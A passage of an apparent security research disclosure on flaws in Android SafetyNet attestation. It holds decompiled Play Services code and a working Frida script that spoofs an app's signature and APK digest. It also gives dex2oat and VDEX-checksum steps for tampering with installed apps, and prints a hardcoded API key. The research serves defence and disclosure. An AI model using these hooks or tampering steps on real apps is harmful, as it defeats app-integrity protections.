u:r:priv_app:s0:c512,c768 u0_a20 5177 614 2487784 124340 SyS_epoll_wait 0 S com.google.android.gms

Our research has concluded that the SafetyNet implementation does not yet utilize the recently introduced hardware-level key attestation. The information about the device status is collected from Java APIs that obtain system properties and access device resources, just as any other user-installed application would. Instead of using the hardware keymaster authorizations (attestation extensions) associated with a generated key, the SafetyNet process simply invokes the android.os.SystemProperties getter to access the verified boot state and the dm-verity status. These values are essential when collecting information about a potential secure boot compromise.

The following code snippet has been decompiled from "snet-03242017-10001000.jar" and demonstrates how the device properties are accessed via the android.os.SystemProperties Java API.

01: package com.google.android.snet;

02:

03: class k {

04: ...

05: static l a(Context arg5, aa arg6) {

06: Object v0_1;

07: Iterator v2;

08: l v1 = new l();

09: v1.a = k.a("ro.boot.verifiedbootstate");

10: v1.b = k.a("ro.boot.veritymode");

11: v1.c = k.a("ro.build.version.security_patch");

12: v1.d = k.b("ro.oem_unlock_supported");

13: v1.e = Build$VERSION.SDK_INT > 23 ? k.a(arg5) : k.b("ro.boot.flash.locked");

14: v1.f = k.a("ro.product.brand");

15: v1.g = k.a("ro.product.model");

16: v1.h = cc.b("/proc/version");

17: ...

18: private static String a(String arg5) {

19: String v0_6;

20: try {

21: Object v0_5 = Class.forName("android.os.SystemProperties").getMethod("get", String.class).invoke(null, arg5);

22: if(!TextUtils.isEmpty(((CharSequence)v0_5))) {

23: return v0_6;

24: }

It is therefore clear that SafetyNet is not ready yet to provide a strong attestation API that is backed by the trusted hardware components. Tampered device images (see Magisk project) or malware that has escalated user-space privileges (e.g. DirtyCow) can easily tamper with the Collector logic. This can be achieved by either explicitly hiding or falsifying collected data (e.g. verified boot status) or via dynamic tampering of the GMS & SNET components (runtime method hooking).

Since this article is focusing on the application integrity capabilities of the SafetyNet attestation API, the following section presents a PoC attack strategy which can be used to tamper with the Requester package info Collector component.

Hooking Framework Methods to Tamper Integrity Digests Collection

The SafetyNet mechanism that is responsible for collecting the Requester digests (APK & signing certificates) is the most important component when implementing an application integrity control. After reverse engineering the GMS and SNET bytecode, we've concluded that the Play Services client simply uses the framework PackageManager class to extract this information. It does not appear to use any secure collection method that utilizes privileged or protected device mechanisms.

The following code snippet has been decompiled from the GMS APK and illustrates the use of the android.content.pm.PackageManager methods to obtain the Requester APK location and calculate its SHA-256 digest (line 24), its signing certificate digests (lines 27 - 37), the installer package name (line 25) and the shared userID (line 26).

01: import android.content.Context;

02: import android.content.pm.PackageManager$NameNotFoundException;

03: import android.content.pm.PackageManager;

04: import android.content.pm.Signature;

05: import java.io.File;

06: import java.io.IOException;

07: import java.security.MessageDigest;

08: import java.security.NoSuchAlgorithmException;

09:

10: public final class PkgInfoCollector {

11: private Context a;

12: private PackageManager b;

13:

14: public PkgInfoCollector(Context arg2) {

15: super();

16: this.a = arg2;

17: this.b = this.a.getPackageManager();

18: }

19:

20: public final aebz collect(String arg7) {

21: int v1 = 0;

22: aebz v0 = new aebz();

23: try {

24: v0.apkDigest = aecg.a(new File(this.b.getApplicationInfo(arg7, 0).sourceDir));

25: v0.installerPkgName = this.b.getInstallerPackageName(arg7);

26: v0.d = this.b.getPackageInfo(arg7, 0).sharedUserId;

27: Signature[] v2 = this.b.getPackageInfo(arg7, 0x40).signatures;

28: v0.certDigests = new byte[v2.length][];

29: MessageDigest v3 = MessageDigest.getInstance("SHA-256");

30: while(true) {

31: if(v1 >= v2.length) {

32: return v0;

33: }

34:

35: v0.certDigests[v1] = v3.digest(v2[v1].toByteArray());

36: ++v1;

37: }

38: }

The execution of the previous method has been confirmed by performing a SafetyNet attestation while hooking the matching methods and tracing the executed paths. Furthermore, we've collected system strace logs that match the observed behavior.

Unfortunately, this Requester information collection mechanism cannot be considered secure when implementing an application integrity mechanism. The SafetyNet implementation does not use a secure method to collect, compute and protect the digests, allowing adversaries to easily plug in a method override and compromise the entire gathering process.
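On the Verifier side, the collected digests are typically compared against the digests of known releases. The sketch below assumes the digest arrives as a Base64 string in the signed response (as with the apkDigestSha256 and apkCertificateDigestSha256 fields) and that the vendor maintains its own list of release digests. The class and method names are hypothetical.

```java
import java.security.MessageDigest;
import java.util.Base64;
import java.util.List;

final class DigestAllowList {
    // Returns true when the reported digest equals one of the known release digests.
    static boolean matchesKnownRelease(String reportedDigestB64, List<byte[]> knownDigests) {
        byte[] reported;
        try {
            reported = Base64.getDecoder().decode(reportedDigestB64);
        } catch (IllegalArgumentException e) {
            return false; // malformed Base64 cannot match anything
        }
        boolean match = false;
        for (byte[] known : knownDigests) {
            // Constant-time comparison; every entry is checked regardless of earlier matches.
            match |= MessageDigest.isEqual(known, reported);
        }
        return match;
    }
}
```

A successful match only proves what PackageManager reported to the collector. If the framework methods are hooked, a tampered app will still present the digest of the original release.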

As a proof-of-concept a generic Frida script has been written to override the collected application information and thus bypass the underlying application integrity mechanisms. The following script can be invoked against any Google Play Services version since it doesn't have any version specific identifier dependencies.

01: var targetPkgName = "com.censuslabs.secutils";

02: var expectedApkPath = "/data/app/com.censuslabs.secutils-1/base.apk";

03: var pathWithOrigApk = "/sdcard/Download/original.apk";

04: var origSig = "" +

05: "30820313308201fba00302010202046e6cfbaa300d06092a864886f70d01010b0500303a310b3009" +

06: "0603550406130245553110300e060355040a1307416e64726f696431193017060355040313104141" +

07: "532d546f6f6c20416e64726f6964301e170d3137303631373038303632335a170d34343131303230" +

08: "38303632335a303a310b30090603550406130245553110300e060355040a1307416e64726f696431" +

09: "193017060355040313104141532d546f6f6c20416e64726f696430820122300d06092a864886f70d" +

10: "01010105000382010f003082010a02820101009bfc181cd28e8046875016f7e263da89d40d0b49bf" +

11: "28e9b01bebd310ebc5cf4c3f5a2b10972a4346e724955d8c2006e185b9f20b5be3c00465070c4ad1" +

12: "79a82e9d89aa6a51acaba6a351bf254a9ce4ea7328d826526cbc096fb82223a6458cf53bea34ec1c" +

13: "86a988621e89b5bd87f51faa8abd99dfae064286f76d26fe155f251bdc5c552801df1b62dc5ce125" +

14: "ae1839373da27559e1eebb59451243ee3b82f1aea7580e5c2c2aeef91e3aaadcf3f96d2215a206b0" +

15: "c7d3347bf50ff94a57796d13c7ab7c4adfb6d5d60a876639df3c73554b6b3e88efbc61b825fa3988" +

16: "6b9afe3825d8b516aaa36db190949bef5593c7ee9b7d97dd8de2c916ae38c85acf665d0203010001" +

17: "a321301f301d0603551d0e0416041452fb7d82c3273c2c9d91fada3364de614511f9af300d06092a" +

18: "864886f70d01010b05000382010100882af5507bcc0648ffafa833bbba6c4c4d8dc83b62817164e1" +

19: "fcfba13d605ea78c9379e39e6a0dc4d1949bc83a2d772923923109281c70782c8fcf5a3a0ec60207" +

20: "934ea9a86de8c91752f5919f52d8bb41b4aa3bda1e8ea843b4457d67113b2be6e4de6d666e92ffdc" +

21: "5cbd77eae234b4d373138db887350bb8c6611b93aa2060cda121d1660dce809cf18118ebc41f9fc8" +

22: "0a0ae96e33d373684d1d0a910ce2d8515e5803da2d5b3b2b75af32a08d1b4084e788f3ea59376fc5" +

23: "9c5969136f6ff4af1b93432b8da4d7bcbd9362a18da10b9b5e5d96488da06a5e4676c69537ecb7aa" +

24: "64c079f2819625ecc0dd130ac6d9dcc00045a883b0ac90f184c78fc65fbd91";

25:

26: Java.perform(function () {

27: var aPkgMgr = Java.use("android.app.ApplicationPackageManager");

28: var pmSig = Java.use("android.content.pm.Signature");

29:

30: aPkgMgr.getApplicationInfo.implementation = function(packageName, flags) {

31: var appInfoRet = this.getApplicationInfo(packageName, flags);

32: if (packageName != targetPkgName) {

33: return appInfoRet;

34: }

35: console.log("[*] hooking getApplicationInfo(\"" + packageName + "\", " + flags + ")'");

36: if (appInfoRet.sourceDir.value == expectedApkPath) {

37: var origPath = appInfoRet.sourceDir.value;

38: appInfoRet.sourceDir.value = pathWithOrigApk;

39: console.log("[+] Changed Apk path from '" + origPath + "' to '" + pathWithOrigApk + "'");

40: }

41: console.log("[*] EOF getApplicationInfo() hooks");

42: return appInfoRet;

43: };

44:

45: aPkgMgr.getInstallerPackageName.implementation = function(packageName) {

46: var iPkgInfoRet = this.getInstallerPackageName(packageName);

47: if (packageName != targetPkgName) {

48: return iPkgInfoRet;

49: }

50: console.log("[*] hooking getInstallerPackageName(\"" + packageName + "\")");

51: console.log("[+] getInstallerPackageName(" + packageName + ") = " + iPkgInfoRet);

52: console.log("[*] EOF getInstallerPackageName() hooks");

53: return "com.android.vending";

54: };

55:

56: aPkgMgr.getPackageInfo.implementation = function(packageName, flags) {

57: var pkgInfoRet = this.getPackageInfo(packageName, flags);

58: if (packageName != targetPkgName) {

59: return pkgInfoRet;

60: }

61: console.log("[*] hooking getPackageInfo(\"" + packageName + "\", " + flags + ")");

62: if (flags == 0x0) {

63: console.log("[+] sharedUserId = " + pkgInfoRet.sharedUserId.value);

64: } else if (flags == 0x40) {

65: var pmSigInstance = pmSig.$new(origSig);

66: var curSignatures = pkgInfoRet.signatures.value;

67: console.log("[+] orig signature = " + curSignatures[0].toCharsString());

68: curSignatures[0] = pmSigInstance;

69: console.log("[+] overwritten signature = " + curSignatures[0].toCharsString());

70: pkgInfoRet.signatures.value = curSignatures;

71: }

72: console.log("[*] EOF getPackageInfo() hooks");

73: return pkgInfoRet;

74: };

75: });

76:

The expected output in the Frida console is the following:

[*] hooking getApplicationInfo("com.censuslabs.secutils", 0)'

[+] Changed Apk path from '/data/app/com.censuslabs.secutils-1/base.apk' to '/sdcard/Download/original.apk'

[*] EOF getApplicationInfo() hooks

[*] hooking getInstallerPackageName("com.censuslabs.secutils")

[+] getInstallerPackageName(com.censuslabs.secutils) = null

[*] EOF getInstallerPackageName() hooks

[*] hooking getPackageInfo("com.censuslabs.secutils", 0)

[+] sharedUserId = null

[*] EOF getPackageInfo() hooks

[*] hooking getPackageInfo("com.censuslabs.secutils", 64)

[+] orig signature = 3082030d308201f5a0030201020204733cb3ed300d06092a864886f70d01010b05003037310b30090603550406130255533110300e060355040a1307416e64726f6964311630140603550403130d416e64726f6964204465627567301e170d3135313231343131333631355a170d3435313230363131333631355a3037310b30090603550406130255533110300e060355040a1307416e64726f6964311630140603550403130d416e64726f696420446562756730820122300d06092a864886f70d01010105000382010f003082010a0282010100acb2079218ab37c268b11236dc68bafe29d0d4d45602ab6c001a0989b8a831923a9c8ce785be65e4e2ef9c414b554f2cb0d1a79531e3fe38c240da0be973e87f7ad03a44212d8f4e226a590ef4cee3bf3829df3a2a38d6ad0d9c28dd51ee406d6195c4cb8ca31c08058c3a675761c04f88b31c7784e9e44ca8350e9bfdf20b9a18cc46d58f4174f901d1c8a3985531e87c846786bcd8310acc998f2234e6f7eddc8213167196cdc0156ba3babf5bb4dbed5ea477bc4f041875ef48f9b86779acd341fe03f38b30ac03eebccc3a22d1ca651a90911db6fd598a6842cfaf55dc5dc2291761f26baa3a9ceb282583b16922a6c0d5704404ad1244cea2aab0718cc70203010001a321301f301d0603551d0e04160414ff76d5f70e74171766ab99cdb6db80ebf38cf491300d06092a864886f70d01010b050003820101008e1a2d1bc2592a72aaa3c32a0de99827ce1d6fb73a91cdc5cb791d42f1493b3ab176a19660068f8a59b5d74a4ed34e2b4059965002b56412b5063093e14adfda3a13f6c8168cfc594c0e772f6f5c89be7bf75b383ea1f105a5575404b6cb2685b4d7748ee62b233fcf0b9346452bf0e49de9324fa62c5fdddd0d3081a2d16070c9b20408068b816f5b49e06c0550d390b21ae6ad404f65d2ca032af74b6547b86d8ed660d4c65e9f96f8c69696a652e899a5a81cbe2f2bf8798063ccaaa792d21cd3af1d9d6b70ff566f335634ba252cd4b51976ad08475c9a439704d969cc7e6d53a5a993457b90acdd920aafd9eab97e60d8ae7d8eac18ee72fa45bdd35687

[+] overwritten signature = 30820313308201fba00302010202046e6cfbaa300d06092a864886f70d01010b0500303a310b30090603550406130245553110300e060355040a1307416e64726f696431193017060355040313104141532d546f6f6c20416e64726f6964301e170d3137303631373038303632335a170d3434313130323038303632335a303a310b30090603550406130245553110300e060355040a1307416e64726f696431193017060355040313104141532d546f6f6c20416e64726f696430820122300d06092a864886f70d01010105000382010f003082010a02820101009bfc181cd28e8046875016f7e263da89d40d0b49bf28e9b01bebd310ebc5cf4c3f5a2b10972a4346e724955d8c2006e185b9f20b5be3c00465070c4ad179a82e9d89aa6a51acaba6a351bf254a9ce4ea7328d826526cbc096fb82223a6458cf53bea34ec1c86a988621e89b5bd87f51faa8abd99dfae064286f76d26fe155f251bdc5c552801df1b62dc5ce125ae1839373da27559e1eebb59451243ee3b82f1aea7580e5c2c2aeef91e3aaadcf3f96d2215a206b0c7d3347bf50ff94a57796d13c7ab7c4adfb6d5d60a876639df3c73554b6b3e88efbc61b825fa39886b9afe3825d8b516aaa36db190949bef5593c7ee9b7d97dd8de2c916ae38c85acf665d0203010001a321301f301d0603551d0e0416041452fb7d82c3273c2c9d91fada3364de614511f9af300d06092a864886f70d01010b05000382010100882af5507bcc0648ffafa833bbba6c4c4d8dc83b62817164e1fcfba13d605ea78c9379e39e6a0dc4d1949bc83a2d772923923109281c70782c8fcf5a3a0ec60207934ea9a86de8c91752f5919f52d8bb41b4aa3bda1e8ea843b4457d67113b2be6e4de6d666e92ffdc5cbd77eae234b4d373138db887350bb8c6611b93aa2060cda121d1660dce809cf18118ebc41f9fc80a0ae96e33d373684d1d0a910ce2d8515e5803da2d5b3b2b75af32a08d1b4084e788f3ea59376fc59c5969136f6ff4af1b93432b8da4d7bcbd9362a18da10b9b5e5d96488da06a5e4676c69537ecb7aa64c079f2819625ecc0dd130ac6d9dcc00045a883b0ac90f184c78fc65fbd91

[*] EOF getPackageInfo() hooks

#3. Post-Installation Tampering

As mentioned in the "Application Integrity" section, the SafetyNet attestation API does not implement any mechanisms to protect the integrity of the applications post-installation and while running (runtime). The runtime hooking techniques described in the previous section can be also directly used against the application assets (e.g. hook app's local security controls). However, we have not covered yet the post-installation cases, which involve tampering with the optimized application executables that are generated when the app is installed.

Before we start describing how optimized application binaries can be tampered with, it is essential to quickly cover the ART runtime bookkeeping internals (how ART tracks the optimized bytecode status).

- DexClassLoader creates a DexPathList instance ("libcore/dalvik/src/main/java/dalvik/system/BaseDexClassLoader.java")

- DexPathList constructor invokes makeDexElements() which then calls loadDexFile() to create the corresponding DexFile instance(s) ("libcore/dalvik/src/main/java/dalvik/system/DexPathList.java")

- DexFile constructor invokes openDexFile() which then calls openDexFileNative() and switches from the Java layer to the native layer of the runtime ("libcore/dalvik/src/main/java/dalvik/system/DexFile.java")

- openDexFileNative() invokes OpenDexFilesFromOat() from the OatFileManager class ("art/runtime/native/dalvik_system_DexFile.cc")

- OpenDexFilesFromOat() invokes IsUpToDate() from OatFileAssistant class to obtain the latest status of the optimized bytecode files and proceed accordingly (e.g. recompile) ("art/runtime/oat_file_manager.cc")

- IsUpToDate() invokes GetBestInfo() which then calls Status() to obtain the actual Oat file status. If the Oat file exists (already optimized bytecode), the GivenOatFileStatus() is invoked to perform the actual file status checks ("art/runtime/oat_file_assistant.cc")

- GivenOatFileStatus() invokes DexChecksumUpToDate() which extracts the original DEX file CRC checksums from the matching APK (DexFile::GetMultiDexChecksums()) and compares them with the ones found in the corresponding VDEX file (VdexFile::GetLocationChecksum()). If the default VDEX support (added in Oreo) is disabled by the vendor, the location checksum is extracted from the OAT file ("art/runtime/oat_file_assistant.cc"). In case the initial input to the dex2oat compiler is an APK, the original checksum is the bytecode zip entry (one or more) CRC and not the DEX header checksum. For example, in the following Sample.apk the classes.dex zip entry checksum "5731c9cc" matches the generated VDEX location checksum.

$ unzip -v Sample.apk classes.dex

Archive: Sample.apk

Length Method Size Cmpr Date Time CRC-32 Name

-------- ------ ------- ---- ---------- ----- -------- ----

177976 Defl:N 73195 59% 01-01-2009 00:00 5731c9cc classes.dex

$ vdexExtractor -i Sample.vdex -o /tmp -d 4 | head -12

[INFO] Processing 1 file(s) from Sample.vdex

------ Vdex Header Info ------

magic header & version : vdex-006

number of dex files : 1 (1)

dex size (overall) : 2b738 (177976)

verifier dependencies size : da8 (3496)

verifier dependencies offset: 2b754 (178004)

quickening info size : 34e4 (13540)

quickening info offset : 2c4fc (181500)

dex files info :

[0] location checksum : 5731c9cc (1462880716)

---- EOF Vdex Header Info ----
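The zip entry CRC shown by unzip can also be read programmatically. The following sketch uses the standard java.util.zip API to return the CRC-32 recorded for an entry such as classes.dex, formatted the same way as in the listings above. The class and method names are hypothetical.

```java
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Path;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

final class DexZipCrc {
    // Returns the CRC-32 stored for entryName as 8 lowercase hex digits,
    // or null when the archive has no such entry.
    static String entryCrcHex(Path archive, String entryName) {
        try (ZipFile zip = new ZipFile(archive.toFile())) {
            ZipEntry entry = zip.getEntry(entryName);
            if (entry == null) {
                return null;
            }
            return String.format("%08x", entry.getCrc());
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }
}
```

For a multidex APK the same call would be repeated for each bytecode entry (classes2.dex and so on), since one location checksum is kept per DEX file.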

From the previous steps we can see that when a DEX file is loaded (application launch) the runtime verifies that the optimized OAT file is valid (checksums match), and then executes the optimized native code. As such, an adversary that wishes to tamper with an OAT file post-installation has to fix up the VDEX file checksum before the application is launched. If not, the modified OAT file will be invalidated and eventually overwritten (or ignored).

Now moving forward with the actual attack strategy, the most important requirement is to escalate privileges in order to gain write permissions under the optimized bytecode output directory (/data/app/<pkg>/oat for user apps or /data/dalvik-cache for system apps). By default, this directory is owned by the system user and is protected by the dalvikcache_data_file SELinux label.

sailfish:/data/app/com.censuslabs.secutils-hdOeNP-2uNwoh5q1AQSB5g== # ls -lZ

total 2840

-rw-r--r-- 1 system system u:object_r:apk_data_file:s0 2887611 2008-12-31 23:56 base.apk

drwxr-xr-x 3 system system u:object_r:apk_data_file:s0 4096 2008-12-31 23:56 lib

drwxrwx--x 3 system install u:object_r:dalvikcache_data_file:s0 4096 2008-12-31 23:56 oat

sailfish:/data/app/com.censuslabs.secutils-hdOeNP-2uNwoh5q1AQSB5g== # ls -lZ oat/arm64/

total 7016

-rw-r--r-- 1 system u0_a29999 u:object_r:dalvikcache_data_file:s0 893568 2008-12-31 23:56 base.odex

-rw-r--r-- 1 system u0_a29999 u:object_r:dalvikcache_data_file:s0 6275666 2008-12-31 23:56 base.vdex

Writing to the dalvik_cache directories requires escalated privileges that bypass both the DAC and MAC protections. For CTS approved ROMs it is expected that vendors enforce these controls, thus requiring the adversary to use a system privilege escalation vulnerability to bypass them. On the other hand, custom ROMs or altered factory images can modify certain device resources and enable users to circumvent them (e.g. system-less SU projects). Collin R. Mulliner has recently presented how the DirtyCow vulnerability can be used to override dalvik_cache files and bypass SafetyNet.

Having the required privileges to write files in the dalvik_cache directories, the following steps can be used to tamper with the optimized bytecode files in a device running the latest Oreo release:

- Extract the APK of the target application and perform the desired modifications (e.g. override certificate pinning control). As an example, this can be achieved by disassembling the target bytecode (baksmali), applying code modifications and assembling it back (smali) to Dalvik bytecode.

- Replace the tampered files in the APK and re-sign it with a self-signed certificate.

- Upload the tampered APK to a directory with write permissions (e.g. /data/local/tmp) and invoke the ART compiler (dex2oat) to generate an OAT file that corresponds to the new APK. If the ART host tools have been compiled from AOSP, the modified APK can be optimized on the host without uploading it to the device. It is important that the "everything" compiler filter flag is used in order to disable the runtime JIT profiler, which might kick in at some point and override the manually replaced OAT file with a legitimate copy. For more info see the ShouldProfileLocation() method in "art/runtime/jit/profile_saver.cc"

$ dex2oat --dex-file=/data/local/tmp/tampered.apk \

--oat-file=/data/local/tmp/tampered.odex --compiler-filter=everything

$ bin/vdexExtractor -i tampered.vdex -v 4 -o .

[INFO] Processing 1 file(s) from tampered.vdex

------ Vdex Header Info ------

magic header & version : vdex-006

number of dex files : 1 (1)

dex size (overall) : 2fb6cc (3126988)

verifier dependencies size : 7568 (30056)

verifier dependencies offset: 2fb6e8 (3127016)

quickening info size : 45996 (285078)

quickening info offset : 302c50 (3157072)

dex files info :

[0] location checksum : e9c607a9 (3922069417)

---- EOF Vdex Header Info ----

[INFO] 1 out of 1 Vdex files have been processed

[INFO] 1 Dex files have been extracted in total

[INFO] Extracted Dex files are available in '.'

$ scripts/update-vdex-location-checksums.sh -i tampered.vdex -a original.apk -o .

[INFO] 1 location checksums have been updated

[INFO] Update Vdex file is available in '.'

$ bin/vdexExtractor -i tampered_updated.vdex -v 4 -o .

[INFO] Processing 1 file(s) from tampered_updated.vdex

------ Vdex Header Info ------

magic header & version : vdex-006

number of dex files : 1 (1)

dex size (overall) : 2fb6cc (3126988)

verifier dependencies size : 7568 (30056)

verifier dependencies offset: 2fb6e8 (3127016)

quickening info size : 45996 (285078)

quickening info offset : 302c50 (3157072)

dex files info :

[0] location checksum : a05879b9 (2690152889)

---- EOF Vdex Header Info ----

[INFO] 0 out of 1 Vdex files have been processed

[INFO] 0 Dex files have been extracted in total

[INFO] Extracted Dex files are available in '.'
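The checksum fix-up shown above can be illustrated with a small sketch. It is not the update-vdex-location-checksums.sh script. It only assumes the vdex-006 layout implied by the header dumps: a 24-byte header (4-byte magic, 4-byte version, four 32-bit little-endian fields) followed by one 32-bit location checksum per DEX file. This is consistent with the dump above, where the verifier dependencies offset (3127016) equals the dex size (3126988) plus 28 for a single DEX file. The class and method names are hypothetical.

```java
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.charset.StandardCharsets;

final class VdexChecksumPatch {
    // Assumed vdex-006 header: magic(4) + version(4) + 4 x uint32.
    static final int HEADER_SIZE = 24;

    // Validates the magic/version and the requested index, then returns a little-endian view.
    private static ByteBuffer checkedView(byte[] vdex, int dexIndex) {
        if (vdex.length < HEADER_SIZE
                || !"vdex006".equals(new String(vdex, 0, 7, StandardCharsets.US_ASCII))) {
            throw new IllegalArgumentException("not a vdex-006 file");
        }
        ByteBuffer buf = ByteBuffer.wrap(vdex).order(ByteOrder.LITTLE_ENDIAN);
        int dexCount = buf.getInt(8); // number of dex files
        if (dexIndex < 0 || dexIndex >= dexCount
                || vdex.length < HEADER_SIZE + 4L * dexCount) {
            throw new IllegalArgumentException("dex index out of range");
        }
        return buf;
    }

    // Reads the location checksum of the given DEX file as an unsigned value.
    static long readLocationChecksum(byte[] vdex, int dexIndex) {
        return checkedView(vdex, dexIndex).getInt(HEADER_SIZE + 4 * dexIndex) & 0xFFFFFFFFL;
    }

    // Returns a copy of the VDEX bytes with the location checksum replaced.
    static byte[] withLocationChecksum(byte[] vdex, int dexIndex, long crc32) {
        byte[] copy = vdex.clone();
        checkedView(copy, dexIndex).putInt(HEADER_SIZE + 4 * dexIndex, (int) crc32);
        return copy;
    }
}
```

In the scenario above, the value written would be the classes.dex zip entry CRC of the original APK, so that the runtime's checksum comparison passes for the tampered optimized files.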

As a final note, it is also important to mention that the native libraries that are included in an APK archive are automatically extracted when the app is installed. The extraction path is /data/app/<pkg>/lib/<ISA>/<libName>.so and is protected via the apk_data_file SELinux label.

sailfish:/data/app/com.censuslabs.secutils-yglIOzwpuQ2nyk2nmiHHlw== # ls -Z lib/arm64

u:object_r:apk_data_file:s0 libenv_profile.so

The extracted native libraries are not protected post-installation and are simply relying on the DAC and MAC restrictions being properly enforced on the device. As such, an adversary that has escalated privileges can directly replace or modify the native libraries without being detected by SafetyNet or any other system control. This marks the native libraries as completely unprotected after the app installation phase.

#4. Google Play Version not Included in Attestation Response

The SafetyNet attestation response does not include the device's Google Play Services version or the SafetyNet version (as defined in the side-downloaded JAR). As such, the Verifier does not have a trusted (signed) version indicator in order to prevent authorization for very old or outdated versions. Since the SafetyNet checks rely strongly on the Play Services APK, users need a trusted mechanism to enforce minimum supported versions. Such a mechanism is particularly useful when aiming to protect users of environments with older versions of Play Services, that are vulnerable to known bugs and public exploits.

Of course, it should be noted that the out-of-band update of the actual snet.jar (as downloaded from "https://www.gstatic.com/android/snet") is most probably effective against the majority of installations. However, the Verifier has no visibility into the running versions and thus cannot proactively prevent access from outdated installations.

The only available option to indirectly work around this API version absence is to always build the application with the latest version of the SDK ("com.google.android.gms:play-services-safetynet"). This will at least ensure that the device is using a Play Services version that belongs to the same major version family that is implied by the SDK dependencies. However, such a workaround is very inefficient for the majority of product lifecycles since it requires extensive testing and porting.

#5. Device Verification API Key Abuse

While reverse engineering the Google Play Services APK we noticed that the client library does not force the Requester application to provide a valid (not null & not empty) device verification API key string. Instead, if the attestation caller provides an empty string, a default hard-coded API key is used (AIzaSyDqVnJBjE5ymo--oBJt3On7HQx9xNm1RHA).

The following code snippet was extracted from the GMS APK and illustrates the failover to the default API key. Notice that when the "SnetAttest" instance is created by the constructor in line 13, the API key is stored in the "developerAPIKey" variable. The "developerAPIKey" is then checked in line 35 when preparing the attestation POST request payload. If it's null or empty, the hardcoded key is used.

01: public class SnetAttest extends mjc {

02: private static String userAgentVersion;

03: private adpo ISafetyNetCallbacks;

04: private byte[] nonce;

05: private String packageName;

06: private String developerAPIKey;

07:

08: static {

09: SnetAttest.class.getSimpleName();

10: SnetAttest.userAgentVersion = new StringBuilder(21).append("SafetyNet/11518940").toString();

11: }

12:

13: public SnetAttest(adpo arg3, byte[] arg4, String arg5, String arg6) {

14: super(45, "attest"); // Async operation (<serviceID>, <operation_name>)

15: this.ISafetyNetCallbacks = arg3;

16: this.nonce = arg4;

17: this.packageName = arg5;

18: this.developerAPIKey = arg6;

19: }

20:

21: private final aegc SnetAttestPost(Context arg8, aegb arg9) {

22: ayck v1_6;

23: InputStream v1_3;

24: aegc v1_4;

25: DataOutputStream v3_2;

26: InputStream v3_1;

27: URLConnection v2_1;

28: URLConnection v0_3;

29: String v3;

30: String v1;

31: aegc v2 = null;

32: mhb.a(0x1802, -1);

33: try {

34: aeca.a(arg8);

35: v1 = TextUtils.isEmpty(this.developerAPIKey) ? "AIzaSyDqVnJBjE5ymo--oBJt3On7HQx9xNm1RHA"

36: : this.developerAPIKey;

37: v3 = String.valueOf(aeca.k.b());

38: String v0_2 = String.valueOf(v1);

39: v0_2 = v0_2.length() != 0 ? v3.concat(v0_2) : new String(v3);

40: v1 = new StringBuilder(String.valueOf(SnetAttest.userAgentVersion).length()

41: + 10 + String.valueOf(Build.DEVICE).length() + String.valueOf(Build.ID).length(

42: )).append(SnetAttest.userAgentVersion).append(" (").append(Build.DEVICE).append(" "

43: ).append(Build.ID).append("); gzip").toString();

44: v0_3 = new URL(v0_2).openConnection();

45: }

The previous code path has been successfully triggered by creating a client application that uses the SafetyNet attestation API with an empty device verification API key. The following code snippet has been extracted from a demo application developed by CENSUS. Notice that in line 48 the SafetyNet attestation instance is generated with an empty key string. As an alternative trigger, the hardcoded key can be directly used from the client app, instead of the empty string.

File: safetynet-client/app/src/main/java/com/censuslabs/secutils/safetynet/SNetWrapper.java

42: public String getJws(byte[] nonce) throws SNetException

43: {

44: if (checkPlayServices() == false) {

45: throw new SNetException("Google Play Services is outdated or not supported");

46: }

47: Task task = SafetyNet

48: .getClient(mContext).attest(nonce, ""); // Empty string instead of DEVICE_VERIFICATION_API_KEY

49: task.addOnFailureListener(new OnFailureListener() {

50: @Override

51: public void onFailure(@NonNull Exception e) {

52: Log.e(TAG, "SafetyNet attestation task failed.");

53: mHasError = true;

54: mErrorMsg = e.getMessage();

55: }

56: });

Based on our general understanding of the Google API authorization principles, the services require developers to register a dedicated key per app / project. This mechanism enables Google to match API keys with developer accounts and effectively blacklist / warn them in case of abuse, while also applying traffic limitations. The hardcoded SafetyNet attestation API key violates this principle and effectively opens the door to attestation API abuse from malware authors.

We believe that Google should revise its policy regarding the hardcoded key, by authorizing the use of the key only by internal services and not external packages.
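Until such a policy change happens, an app developer can at least avoid silently falling back to the hardcoded key. The following is a minimal sketch of a client-side guard, under the assumption that the app keeps its own key in a build-time constant. The class and method names are hypothetical, and the guard does nothing to stop other packages from using the default key.

```java
final class ApiKeyGuard {
    // Fails fast on a missing key so the GMS default key is never used by accident.
    static String requireApiKey(String apiKey) {
        if (apiKey == null || apiKey.trim().isEmpty()) {
            throw new IllegalArgumentException(
                    "Device verification API key is missing; refusing to call attest()");
        }
        return apiKey;
    }
}
```

In the demo wrapper shown earlier, the result of requireApiKey() would be passed as the second argument of attest() instead of the empty string.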

#6. Missing Installer Package Name

As part of the attestation request data collection, the GMS application collects a series of information about the Requester application. This information includes the APK digest, the signing certificate digests, the installer package name and the app shared UID. The first two are transmitted to the Google API backend, while the last two are not. As such, the API backend has no knowledge of the Requester installer's package name, and thus it is not included in the attestation response.

When reverse engineering the GMS application we've noticed that the package information collector class does extract the installer package name, although this information is never sent to the API backend. In line 11 of the following code snippet the payload generation function invokes the collect method of the PkgInfoCollector class to obtain the Requester package information. From the returned object, only the apkDigest and the certDigests items are extracted.

01: public final void generateAttestRequestPayload(Context arg14) {

02: ...

03: Status v2_1 = Status.a;

04: AttestationRequestData v7 = new AttestationRequestData();

05: v7.nonce = this.nonce;

06: v7.timestamp = System.currentTimeMillis();

07: if(this.packageName != null) {

08: v7.pkgName = this.packageName;

09: }

10:

11: aebz v1_1 = new PkgInfoCollector(arg14).collect(this.packageName);

12: if(v1_1.apkDigest != null) {

13: v7.apkDigest = v1_1.apkDigest;

14: }

15:

16: if(v1_1.certDigests != null) {

17: v3 = v1_1.certDigests.length;

18: v7.certDigests = new byte[v3][];

19: int v0_2;

20: for(v0_2 = 0; v0_2 < v3; ++v0_2) {

21: v7.certDigests[v0_2] = v1_1.certDigests[v0_2];

22: }

23: }

24:

25: v7.gplayVersion = 11518940;

26: v7.isUsingCNDomain = ljj.e(arg14);

However, the PkgInfoCollector actually gathers the installer package name and returns it to the caller (line 16), but this information is never used.

01: public final class PkgInfoCollector {

02: private Context a;

03: private PackageManager b;

04:

05: public PkgInfoCollector(Context arg2) {

06: super();

07: this.a = arg2;

08: this.b = this.a.getPackageManager();

09: }

10:

